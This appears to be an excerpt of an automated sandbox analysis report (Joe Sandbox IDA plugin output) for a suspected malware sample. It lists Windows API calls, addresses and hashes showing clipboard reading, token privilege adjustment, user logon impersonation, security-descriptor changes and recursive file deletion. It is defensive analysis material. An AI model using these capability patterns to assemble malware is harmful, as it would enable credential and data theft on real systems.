                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: ec6c2dd6dc760e54cf44796e679fa0a0932f0a7bce5b7c1429a654659dacb245
                                                                                                                                                                                                                                                                  • Instruction ID: 1bd8ec04eaec5186bcac10760d074f9d124f058dd8c0dbc957e9b7b581e7c62b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec6c2dd6dc760e54cf44796e679fa0a0932f0a7bce5b7c1429a654659dacb245
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DEE06D21248720B6DA212676FE01BDB3A58EF413A4F190165FC49E76D5FF70DEC085B4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b9927cc4fdbc7d23071994d6810f554e476794f8391094e27a47b218d0f592b6
                                                                                                                                                                                                                                                                  • Instruction ID: 57a24ec3d2d5bcd08b067de3c94fe8b13c3c8b9bfbc0e717291cf5303cab8c1c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9927cc4fdbc7d23071994d6810f554e476794f8391094e27a47b218d0f592b6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF03071115751CFCB749F65E490816B7F4BF2435A314897EE5DA86610C7319840DF20
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4b391902cce3432e5ee9016e1ac70703d589644f1aea5c824065085f73aa31f1
                                                                                                                                                                                                                                                                  • Instruction ID: dd49a446741299916805b31ef0588ca6965b5130174caba125e1cf384c5bae16
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b391902cce3432e5ee9016e1ac70703d589644f1aea5c824065085f73aa31f1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F0E571704304BAD7208B74A8097B5F7E8EB10314F18851AD9D9C2181D7F2C4D497B2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                  • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                  • Instruction ID: 049aa1ae411489e604c228e93bf8328e13d8be87305c056ae397b9124cf22564
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF0F87550020DFFDF05DF90C941EAEBB79FB14318F248445F9159A151C336EA21ABA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00CE3963
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00CE3A76
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 541455249-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000000,?,00D20A84,?,?,00000000,?,00D20A84,00000000,0000000C), ref: 00D20737
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00D4D840), ref: 00D4EAB1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DC54: FindFirstFileW.KERNEL32(?,?), ref: 00D4DCCB
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00D4DD1B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00D4DD2C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DC54: FindClose.KERNEL32(00000000), ref: 00D4DD43
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D5666E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2191629493-0
APIs
  • Part of subcall function 00D42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D4205A
  • Part of subcall function 00D42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D42087
  • Part of subcall function 00D42010: GetLastError.KERNEL32 ref: 00D42097
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00D41BD2
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00D41BF4
• CloseHandle.KERNEL32(?), ref: 00D41C05
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D41C1D
• GetProcessWindowStation.USER32 ref: 00D41C36
• SetProcessWindowStation.USER32(00000000), ref: 00D41C40
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D41C5C
  • Part of subcall function 00D41A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D41B48), ref: 00D41A20
  • Part of subcall function 00D41A0B: CloseHandle.KERNEL32(?,?,00D41B48), ref: 00D41A35
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0
• API String ID: 22674027-1027155976
• Opcode ID: 4dc655cc8e56f4f9f017a5da329a2a3b7142ec47cfc723a603006ec26698d20b
• Instruction ID: 66dd7ca5dd26bcd78d2e35517f9d5a639be36848be213124d8e86bd45eae3f50
• Opcode Fuzzy Hash: 4dc655cc8e56f4f9f017a5da329a2a3b7142ec47cfc723a603006ec26698d20b
• Instruction Fuzzy Hash: 518148B5900309ABDF119FA4DC49FEE7BB9EF08304F184129F919E62A0E7758985CB74
APIs
  • Part of subcall function 00D41A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D41A60
  • Part of subcall function 00D41A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A6C
  • Part of subcall function 00D41A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A7B
  • Part of subcall function 00D41A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A82
  • Part of subcall function 00D41A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D41A99
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D41518
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D4154C
• GetLengthSid.ADVAPI32(?), ref: 00D41563
• GetAce.ADVAPI32(?,00000000,?), ref: 00D4159D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D415B9
• GetLengthSid.ADVAPI32(?), ref: 00D415D0
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D415D8
• HeapAlloc.KERNEL32(00000000), ref: 00D415DF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D41600
• CopySid.ADVAPI32(00000000), ref: 00D41607
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D41636
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D41658
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D4166A
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D41691
• HeapFree.KERNEL32(00000000), ref: 00D41698
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D416A1
• HeapFree.KERNEL32(00000000), ref: 00D416A8
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D416B1
• HeapFree.KERNEL32(00000000), ref: 00D416B8
• GetProcessHeap.KERNEL32(00000000,?), ref: 00D416C4
• HeapFree.KERNEL32(00000000), ref: 00D416CB
  • Part of subcall function 00D41ADF: GetProcessHeap.KERNEL32(00000008,00D414FD,?,00000000,?,00D414FD,?), ref: 00D41AED
  • Part of subcall function 00D41ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D414FD,?), ref: 00D41AF4
  • Part of subcall function 00D41ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D414FD,?), ref: 00D41B03
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 362132f09dd4863fa0dac3f988b742db8f66d33190cd01101ea715b695f8a92b
• Instruction ID: 7e6cf082ffcfa79577ca045655e2ad1ed9a80d99e5b58c806a936ac577352a6e
• Opcode Fuzzy Hash: 362132f09dd4863fa0dac3f988b742db8f66d33190cd01101ea715b695f8a92b
• Instruction Fuzzy Hash: 1C715BB6900209ABDF10DFA5DC49FEEBBB9BF04350F094615E919E6290E731D985CBB0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00D7DCD0), ref: 00D5F586
                                                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00D5F594
                                                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00D5F5A0
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00D5F5AC
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D5F5E4
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00D5F5EE
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D5F619
                                                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00D5F626
                                                                                                                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00D5F62E
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D5F63F
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D5F67F
                                                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 00D5F695
                                                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000F), ref: 00D5F6A1
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D5F6B2
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00D5F6D4
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00D5F6F1
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00D5F72F
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D5F750
                                                                                                                                                                                                                                                                  • CountClipboardFormats.USER32 ref: 00D5F771
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00D5F7B6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 420908878-0
                                                                                                                                                                                                                                                                  • Opcode ID: b52eb9178c69ea96dd7421a594dc79310f486f32e9ccd71d137f0d915e51d43b
                                                                                                                                                                                                                                                                  • Instruction ID: 820a9249f6143973261422d9bcff1e4391a2772faf0f7fca3e8a851e01aa1a1d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b52eb9178c69ea96dd7421a594dc79310f486f32e9ccd71d137f0d915e51d43b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F619E352043419FD700EF20D884E2AB7B5AF88705F184568FC8ACB2A2EB31ED49DB71
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00D57403
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D57457
                                                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D57493
                                                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D574BA
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D574F7
                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D57524
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                  • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                  • Opcode ID: 973d0bc0a729e50d39d9b8bf7ed078cf2aff59c7054ce215d96122c52a5460dc
                                                                                                                                                                                                                                                                  • Instruction ID: 53382557726bad9ea766043e6769473425b072554860197b354af98ddf0412f4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 973d0bc0a729e50d39d9b8bf7ed078cf2aff59c7054ce215d96122c52a5460dc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D16072508344AEC710EB65C881EBFB7ECAF98704F44091DF989D6252EB74DA48DB62
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00D5A0A8
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00D5A0E6
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00D5A100
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00D5A118
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A123
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00D5A13F
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D5A18F
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00DA7B94), ref: 00D5A1AD
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D5A1B7
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A1C4
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A1D4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                                                  • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                  • Opcode ID: cbbce96a08759644e0af2393d4f974c3eba3924271542b77aca361cb64a664dd
                                                                                                                                                                                                                                                                  • Instruction ID: 34d15983533419dc92ba2f1cf7c0418fb0cc73ae70ef59946a8be834884a98bb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbbce96a08759644e0af2393d4f974c3eba3924271542b77aca361cb64a664dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4831B0726007296EDF10AFB8DC49EDE73AD9F05321F144255EC19E2190EB70DA898A75
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D54785
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D547B2
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D547E2
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D54803
                                                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00D54813
                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00D5489A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D548A5
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D548B0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                  • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                  • Opcode ID: d4f6a089bc9436f834b6fef44fc9057b125bfc8f92f1ae2709e6878019d4eed8
                                                                                                                                                                                                                                                                  • Instruction ID: fb5acf7135dff8235d202ac789ba07910e6f0832b07674bd805389326f39a468
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4f6a089bc9436f834b6fef44fc9057b125bfc8f92f1ae2709e6878019d4eed8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C531A171900249ABDF219BA0DC49FEB37BDEF89705F5040B6FA09D6160EB7096888B75
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00D5A203
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00D5A25E
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A269
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00D5A285
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D5A2D5
